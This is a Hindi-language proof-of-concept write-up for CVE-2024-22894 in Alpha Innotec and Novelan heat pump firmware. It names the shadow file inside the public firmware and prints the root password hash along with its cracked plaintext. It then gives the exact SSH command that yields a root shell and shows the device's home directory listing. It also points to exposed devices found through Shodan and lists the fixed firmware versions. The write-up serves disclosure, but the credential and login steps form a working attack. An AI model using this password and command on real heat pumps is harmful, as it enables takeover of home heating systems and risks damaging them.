
CVE-2024-22894 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो अल्फा इनोटेक/नोवेलन हीटपंप फर्मवेयर से 3DES-एन्क्रिप्टेड रूट पासवर्ड निकालने का प्रदर्शन करता है, जिससे कमजोर IoT उपकरणों तक SSH पहुंच संभव होती है।
हीटपंप का नवीनतम फर्मवेयर संस्करण wp2reg-V3.88.0-9015 डाउनलोड किया https://www.heatpump24.com/DownloadArea.php से।
इस फर्मवेयर के अंदर एक फ़ाइल है जिसका नाम है: wp2reg-V3.88.0-9015\wp2reg-AlphaInnotech-prod\home.wp2reg-V3.88.0-9015_221213\share\shadow
इसमें सिस्टम रूट उपयोगकर्ता का 3DES एन्क्रिप्टेड पासवर्ड root:MEfgX2vrPJzuE:0:0:99999:7::: है और जब डिक्रिप्ट/क्रैक किया जाता है (5 सेकंड के भीतर) तो पासवर्ड eschi दिखाई देता है।
जब आप मेरे हीटपंप को नेटवर्क केबल का उपयोग करके नेटवर्क से जोड़ते हैं, तो आप 'root' उपयोगकर्ता और मिले पासवर्ड का उपयोग करके उपलब्ध SSH सेवा में लॉगिन कर सकते हैं।
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes256-cbc root@$IP
$IP's password: eschi
# id
uid=0(root) gid=0 groups=0
# uname -a
Linux [...] 2.6.33.20 #3 PREEMPT Wed Oct 24 14:25:34 CEST 2018 armv5tejl GNU/Linux
यह कमजोरी सभी Alpha Innotec और Novelan हीटपंपों पर लागू होती है, जो Luxtronic नियंत्रक चला रहे हैं। इसे AIT Deutschland, जो Alpha Innotec और Novelan का OEM है, द्वारा सत्यापित और संबोधित किया गया है और यह कमजोरी निम्नलिखित फर्मवेयर संस्करणों में मौजूद है:
V2.88.3 से पूर्व के संस्करणV3.89.0 से पूर्व के संस्करणV4.81.3 से पूर्व के संस्करणहीट पंप का दुरुपयोग करने के लिए उसे LAN (RJ-45) कनेक्शन का उपयोग करके नेटवर्क से जुड़ा होना आवश्यक है। Shodan के अनुसार अभी भी 47 हीटपंप उसी SSH संस्करण और फिंगरप्रिंट का उपयोग करके इंटरनेट से जुड़े हुए हैं, जो इस शोषण का उपयोग करके समझौता किए जा सकते हैं।
एक बार शोषण करने पर, सेटिंग्स बदलने या पूरे कॉन्फ़िगरेशन/सॉफ्टवेयर को हटाने से बहुत नुकसान हो सकता है, जिससे हीट पंप खराब हो सकता है या क्रैश हो सकता है। उदाहरण के लिए, होम निर्देशिका में निम्नलिखित फ़ाइलें हैं जो एक हमलावर के लिए रुचिकर हो सकती हैं:
# ls -alh /home
total 7448
drwxr-xr-x 5 root 0 4.8K Jan 12 08:59 .
drwxr-xr-x 14 root 0 992 Aug 1 2011 ..
drwxr-xr-x 3 root 0 224 Jan 1 1970 .update
-rw-rw-rw- 1 root 0 92.3K Jul 20 2022 10Min_1
-rw-rw-rw- 1 root 0 92.3K Sep 15 2022 10Min_2
-rwxrwxrwx 1 root 0 22.3K Jan 13 2021 ASB.bin
-rwxrwxrwx 1 root 0 23.3K Jul 15 2019 ASB_BL_Switch.bin
-rwxrwxrwx 1 root 0 22.1K Jul 15 2019 ASB_bootloader.bin
-rwxrwxrwx 1 root 0 1.2K Jun 16 2021 Defines.txt
-rwxrwxrwx 1 root 0 15.7K Jun 14 2021 HZIO.lin
-rw-rw-rw- 1 root 0 648 Jan 3 18:55 Info.dti
-rwxrwxrwx 1 root 0 15.3K Jul 24 2020 LD2AG.lin
-rwxrwxrwx 1 root 0 37.5K Jul 15 2019 LWD.lin
-rwxrwxrwx 1 root 0 26.8K Feb 8 2021 LWD45.lin
-rwxrwxrwx 1 root 0 38.8K Jul 15 2019 LWD90.lin
-rwxrwxrwx 1 root 0 37.9K Jul 15 2019 LWDRev.lin
-rwxrwxrwx 1 root 0 40.0K Jun 16 2021 LuxConst.sqlite
-rwxrwxrwx 1 root 0 26.9K Jul 24 2020 MSW_15.lin
-rwxrwxrwx 1 root 0 28.4K Jul 24 2020 MSW_Inverter.lin
-rw-rw-rw- 1 root 0 435.2K Jan 12 08:59 NewProc
-rw-rw-rw- 1 root 0 8.8K Jan 1 01:00 ParamArchive_1704067200
[...]
-rw-rw-rw- 1 root 0 8.8K Jan 12 01:00 ParamArchive_1705017600
-rwxrwxrwx 1 root 0 96.9K Jul 15 2019 SEC.bin
-rwxrwxrwx 1 root 0 31.6K Jul 15 2019 SWP.lin
-rwxrwxrwx 1 root 0 30.6K Jul 15 2019 SWPH.lin
-rwxrwxrwx 1 root 0 30.4K Jul 15 2019 SWPH291.lin
drwxrwxrwx 2 root 0 648 Apr 25 2023 Webserver
-rwxrwxrwx 1 root 0 5.0M Jun 16 2021 appl
-rwxrwxrwx 1 root 0 147 Jul 15 2019 appl.cfg
-rw-rw-rw- 1 root 0 8.8K Jan 12 08:59 appl_param1
-rw-rw-rw- 1 root 0 8.8K Jan 12 06:59 appl_param2
-rwxrwxrwx 1 root 0 9.4K Jul 15 2019 bootloader.lin
-rw-r--r-- 1 root 0 20.0K Jan 1 05:10 default.sqlite
-rw-r--r-- 1 root 0 0 Jan 1 1970 default.sqlite-wal
-rw-rw-r-- 1 root 0 56 Sep 15 2022 errlog
-rw-r--r-- 1 root 0 42.9K Apr 1 2011 firmware
-rwxrwxrwx 1 root 0 391 Jul 15 2019 index.html
-rwxrwxrwx 1 root 0 35.2K Jun 16 2021 lang_CR
[...
-rwxrwxrwx 1 root 0 37.8K Jun 16 2021 lang_tr
drwxr-xr-x 2 root 0 360 Jan 1 1970 share
-rwxrwxrwx 1 root 0 37 Jul 15 2019 timezone
-rwxrwxrwx 1 root 0 1.1K Jul 15 2019 udhcpc.script
V2.88.3 या उच्चतरV3.89.0 या उच्चतरV4.81.3 या उच्चतरक्रेडिट AIT-Deutschland को जाता है जिसने इस मुद्दे को गंभीरता से लिया और प्राथमिकता के साथ इसे ठीक किया।